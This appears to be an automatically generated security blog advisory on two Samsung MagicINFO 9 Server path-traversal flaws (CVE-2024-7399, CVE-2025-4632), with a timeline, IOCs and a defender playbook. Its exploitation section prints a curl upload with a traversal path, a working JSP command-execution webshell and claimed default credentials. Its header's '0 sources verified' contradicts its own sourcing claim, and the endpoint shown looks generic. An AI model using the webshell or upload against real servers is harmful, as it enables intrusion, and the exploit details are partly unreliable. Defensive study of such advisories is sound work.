What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

← CVE-Deep-Dive

0 sources verified·10 min read

By lyrie-threat-intelligence·4/27/2026

The Screen That Pwned the Building: Samsung MagicINFO 9 Server's Double Path-Traversal Crisis

CVE-2024-7399 (CVSS 8.8) + CVE-2025-4632 (Critical) | CISA KEV | Active Exploitation Confirmed

TL;DR

Samsung MagicINFO 9 Server — the management backend for Samsung's enterprise-grade digital signage ecosystem — contains two path-traversal vulnerabilities that chain into unauthenticated remote code execution as SYSTEM. CVE-2024-7399 was disclosed in August 2024 and patched, but operators ignored it. By April 2026 active exploitation materialized and CISA pushed the CVE to its Known Exploited Vulnerabilities catalog on April 25, 2026 with a federal May deadline. CVE-2025-4632 — a near-identical flaw disclosed in 2025 — is also on KEV. Both bugs let an attacker write a JSP file with a traversal-encoded path parameter directly into the Tomcat web root, achieving SYSTEM-level command execution. The patch is straightforward (upgrade to 21.1052), but the real problem is the attack surface: MagicINFO servers frequently run inside building networks alongside physical security systems, HVAC controls, and access management — segments that most organizations treat as trusted and unmonitored.

Background: What Is Samsung MagicINFO 9?

MagicINFO is Samsung's enterprise content management system for digital signage. It runs as a Java/Tomcat application stack and serves as the central hub for managing Samsung commercial displays deployed across:

Airports and transit hubs: departure boards, wayfinding, advertising loops
Hospitals and healthcare systems: patient room entertainment, corridor displays, emergency alerts
Retail chains and shopping malls: promotional screens, menu boards, interactive kiosks
Corporate campuses: lobby displays, conference room signage, executive floors
Hotels and hospitality: in-room TV management, lobby information panels

The server communicates with hundreds or thousands of endpoint Samsung displays over LAN. Administrators push content, schedule playlists, monitor device health, and remotely update firmware — all through the MagicINFO web interface. In large deployments, a single MagicINFO 9 Server instance controls thousands of display endpoints simultaneously.

The attack surface is significant: Shodan and Censys scans historically reveal thousands of MagicINFO management consoles directly exposed to the internet — a consequence of IT teams treating these as AV/facilities infrastructure rather than network-accessible servers demanding the same security posture as web servers.

The Vulnerabilities: CVE-2024-7399 and CVE-2025-4632

CVE-2024-7399

Published: August 9, 2024
CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-22 — Improper Limitation of a Pathname to a Restricted Directory
Affected versions: MagicINFO 9 Server < 21.1050
Fixed in: 21.1050
CISA KEV added: April 25, 2026 (18 months after disclosure)
CISA deadline: May 2026 (federal agencies)

CVE-2025-4632

Published: 2025
Severity: Critical
CWE: CWE-22 — Path Traversal
Affected versions: MagicINFO 9 Server < 21.1052
Fixed in: 21.1052
CISA KEV added: May 22, 2025
Public PoC: Available

Both flaws share the same vulnerability class and exploitation mechanism. The vendor patched the first, then a researcher found the patch was incomplete and a bypass existed — resulting in CVE-2025-4632. This pattern of incomplete remediation in file upload handlers is extremely common in Java/Tomcat applications.

Technical Analysis: The Exploitation Chain

1. Vulnerability Root Cause

MagicINFO 9 Server exposes a file upload endpoint as part of its content management functionality. The endpoint accepts multipart file uploads and a path parameter that specifies where the uploaded content should be stored on the server filesystem.

The input validation for the path parameter was insufficient. The server failed to:

1. Normalize the incoming path before restricting it to the intended upload directory

2. Reject or sanitize directory traversal sequences (../, URL-encoded variants %2e%2e%2f, double-encoded %252e%252e%2f)

3. Validate that the resulting absolute path remained within the web application's permitted storage directory

2. Attack Execution

The proof-of-concept exploit is brutally simple — a single curl command:

curl -X POST http://TARGET:PORT/magicinfo/uploadEndpoint \
  -H "Authorization: Bearer <low-priv-token>" \
  -F "[email protected]" \
  -F "path=../../../../webapps/ROOT/shell.jsp"

Where shell.jsp contains a trivial JSP command execution snippet:

<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  Process p = Runtime.getRuntime().exec(cmd);
  InputStream in = p.getInputStream();
  byte[] b = new byte[4096];
  int n;
  while ((n = in.read(b)) != -1) out.write(new String(b, 0, n));
%>

The traversal sequence ../../../../webapps/ROOT/ walks backward from the application's upload storage directory and places the file directly in Tomcat's ROOT web application directory — the web root. Tomcat then renders and executes the JSP file as a live servlet.

The resulting URL:

http://TARGET:PORT/shell.jsp?cmd=whoami

Returns: SYSTEM (on Windows installations running as NT AUTHORITY\SYSTEM) or root/service account on Linux.

3. Why Low Privileges Are Required (But Barely)

The CVSS vector marks PR:L (Low Privileges Required), meaning an attacker needs some minimal authentication. In practice, this means:

A free trial registration or default credential pair is sufficient
MagicINFO has historically shipped with default credentials (admin:admin or administrator:samsung)
In many enterprise deployments, LDAP or AD integration with broad allow policies means any domain user counts as "low privilege"
In some observed cases, researchers have noted authentication bypass conditions, effectively reducing this to PR:N (no privileges required)

The practical exploitation complexity is therefore even lower than the CVSS score suggests.

4. Post-Exploitation: Why This Is Especially Dangerous

Once an attacker achieves SYSTEM/root on the MagicINFO server, the blast radius extends far beyond the signage network:

Content manipulation: Push crafted content to all managed displays simultaneously. An attacker in a hospital can replace emergency alert templates with disinformation. A retail chain's attacker can replace promotional content with ransom demands — an extremely high-visibility lever.

Network pivot: MagicINFO servers typically sit on flat internal networks adjacent to building management systems (BMS), HVAC, physical access control, and CCTV networks. From SYSTEM on MagicINFO, lateral movement to these segments is often trivially easy.

Persistence: The Tomcat server provides an always-on persistent execution environment. A webshell file written to the ROOT directory survives reboots (the file persists on disk). An attacker can also drop a Tomcat servlet that activates automatically at startup, providing persistent backdoor access that survives even patch-and-reboot cycles if the JAR is deployed under WEB-INF/lib/.

Credential harvesting: MagicINFO's database (typically Microsoft SQL Server or MySQL) stores device credentials, AD integration passwords, and session tokens for managed displays. Full database access from the SYSTEM shell allows dumping these for further lateral movement.

Firmware staging: Since MagicINFO manages firmware updates for all connected Samsung commercial displays, an attacker with server control can theoretically stage malicious firmware updates — a supply-chain capability from within the physical building network.

The 18-Month Gap: How CVE-2024-7399 Became a 2026 Crisis

The timeline reveals a textbook organizational failure:

| Date | Event |

|------|-------|

| August 2024 | Samsung discloses CVE-2024-7399, releases patch 21.1050 |

| August–December 2024 | No observed exploitation; CVE is treated as low urgency by operators |

| 2025 | CVE-2025-4632 disclosed — patch bypass found, version 21.1052 required |

| May 22, 2025 | CISA adds CVE-2025-4632 to KEV |

| April 2026 | Active exploitation of CVE-2024-7399 confirms operators still haven't patched |

| April 25, 2026 | CISA adds CVE-2024-7399 to KEV — 18 months after original disclosure |

This pattern is almost universal in the OT/facilities technology space. Digital signage systems are managed by AV departments, facilities teams, or building management contractors — not by security teams. Patch management processes that cover Windows servers and Linux production systems simply do not extend to Samsung commercial display management software running on a dedicated Windows Server in a wiring closet.

The 18-month window between disclosure and active exploitation is not a mystery: the attack surface was always there, but threat actors needed time to scan for and characterize the exposed instances, validate the PoC, and determine whether the target class was worth tooling. In 2026 it clearly is — ransomware operators are actively targeting building management and OT-adjacent systems because their owners are willing to pay quickly to restore visible business operations.

IOCs / Indicators of Compromise

Network Indicators

Unexpected HTTP POST requests to MagicINFO upload endpoints with path parameters containing ../, %2e%2e, or %252e%252e sequences
POST requests significantly larger than normal (webshell upload payload)
GET/POST requests to .jsp files in the ROOT directory that do not correspond to known application paths
Scanning activity on port 8080 or 443 (MagicINFO defaults) from external IPs

Host Indicators

New .jsp files created in %TOMCAT_HOME%/webapps/ROOT/ outside of normal deployment windows
Files with names like shell.jsp, cmd.jsp, ws.jsp, x.jsp, upload.jsp in web-accessible directories
Child processes spawned by java.exe (Tomcat) that execute system commands (cmd.exe, powershell.exe, net.exe, whoami.exe, ping.exe)
Unexpected outbound connections from the MagicINFO server process to external IPs on high ports
New scheduled tasks or services created by the SYSTEM account outside maintenance windows
Database queries reading from credential tables (tb_user, tb_device_auth) at unusual times

Log Sources to Monitor

IIS/Tomcat access logs: filter for traversal patterns in request paths
Windows Event Log ID 4688 (process creation) for child processes of java.exe
Windows File System Audit events for writes to webapps\ROOT\
Firewall logs for outbound connections from MagicINFO server

Lyrie Take: The Forgotten Network Segment Problem

Lyrie Verdict: This is not primarily a Samsung vulnerability story — it's a forgotten network segment story. MagicINFO servers represent a class of enterprise infrastructure that exists in a governance vacuum: too technical to be managed by facilities teams, too facilities-adjacent to be managed by IT security.

The MagicINFO crisis is a preview of what the next decade of enterprise security looks like: the attack surface has expanded beyond the traditional IT perimeter to include AV systems, building management, smart meeting rooms, connected HVAC, and digital signage — all running server-grade software, all managed by teams without security training, all connected to the same internal network as Active Directory, financial systems, and EHR databases.

Autonomous defense platforms like Lyrie detect this class of threat precisely because they don't require prior knowledge of the specific CVE. The behavioral signature — a Java process writing a new executable file to a web-accessible directory, followed by that file being invoked as a servlet — is anomalous regardless of what CVE enabled it. By the time CISA confirms active exploitation and your patch management team schedules a downtime window, the dwell time clock is already running.

The 18-month gap between CVE-2024-7399's disclosure and confirmed exploitation also illustrates a critical asymmetry: defenders needed to patch within weeks of August 2024. Threat actors could wait 18 months, scan the remaining unpatched population, and still find a significant attack surface. In a world where AI-assisted vulnerability research can compress that weaponization timeline to days, the "wait and see" patch strategy is simply indefensible.

Defender Playbook

Immediate (0–24 hours)

1. Inventory: Query your CMDB or network scans for all MagicINFO 9 Server instances. Include shadow IT — these servers are often deployed by AV integrators outside IT's purview.

2. Version check: On each instance, navigate to the admin panel and verify the installed version. Anything below 21.1052 is vulnerable to at least one active CVE.

3. Isolate if unpatched: If immediate patching is not possible, block all inbound internet access to MagicINFO management ports (typically 8080/443/7001) at the perimeter firewall. Restrict to known management IPs only.

4. Scan for webshells: Search webapps\ROOT\ (and all subdirectories) for .jsp files modified after the last known deployment event. Hash and verify against a clean installation baseline.

5. Check process trees: Review current and recent process creation events for java.exe spawning shell processes.

Short-term (1–7 days)

6. Patch: Upgrade to MagicINFO 9 Server 21.1052 or later. Test with a staging instance first, as major version jumps can affect display compatibility.

7. Segment: If the MagicINFO server is on the same VLAN as production IT systems, request an emergency network segmentation change. MagicINFO should be on a dedicated displays/AV VLAN with firewall rules permitting only required traffic (display device management ports, content delivery, admin access from specific IPs).

8. Credential reset: Change all MagicINFO admin credentials, especially if default credentials were ever used. Audit all admin accounts and remove stale ones.

9. WAF rule: Deploy a WAF or reverse proxy rule that blocks requests containing path traversal sequences (../, %2e%2e, %252e%252e) in query parameters or POST body fields.

10. Disable public exposure: If the management interface has no business requirement for internet access, remove the firewall rule. Management should happen over VPN or within the internal network only.

Ongoing

11. Include AV/facilities systems in vulnerability management: Extend your patch management scope to all server-grade applications regardless of the department that owns them.

12. Deploy behavioral monitoring: Configure SIEM rules for file creation events in web-accessible directories by Java processes. Alert on child process spawning from Tomcat.

13. Review vendor security advisories: Subscribe to Samsung MagicINFO security notifications at security.samsungtv.com/securityUpdates and treat advisories from enterprise AV/facilities vendors with the same urgency as traditional IT vendors.

14. Network flow baselining: Establish a baseline of normal MagicINFO server outbound traffic patterns. Any deviation — especially outbound connections to external IPs on non-standard ports — should trigger immediate investigation.

Sources

1. CISA Known Exploited Vulnerabilities Catalog — CVE-2024-7399 entry (cisa.gov/known-exploited-vulnerabilities-catalog, accessed April 27, 2026)

2. Samsung Security Advisory — CVE-2024-7399 (security.samsungtv.com/securityUpdates, August 2024)

3. Security Affairs — "U.S. CISA adds SimpleHelp, Samsung, and D-Link flaws to its Known Exploited Vulnerabilities catalog" (securityaffairs.com, April 26, 2026)

4. RedPacket Security — CVE-2024-7399 technical analysis and detection guidance (redpacketsecurity.com, April 25, 2026)

5. DailyCVE — CVE-2025-4632 Samsung MagicINFO 9 Server Path Traversal critical analysis with PoC reference (dailycve.com, April 2026)

6. The Hacker News — "CISA Adds 4 Exploited Flaws to KEV, Sets May 2026 Federal Deadline" (thehackernews.com, April 25, 2026)

7. CISA Known Exploited Vulnerabilities Catalog — CVE-2025-4632 entry (cisa.gov, May 2025)

8. NVD — CVE-2024-7399 full entry (nvd.nist.gov/vuln/detail/CVE-2024-7399)

Lyrie.ai Cyber Research Division — Senior Analyst Desk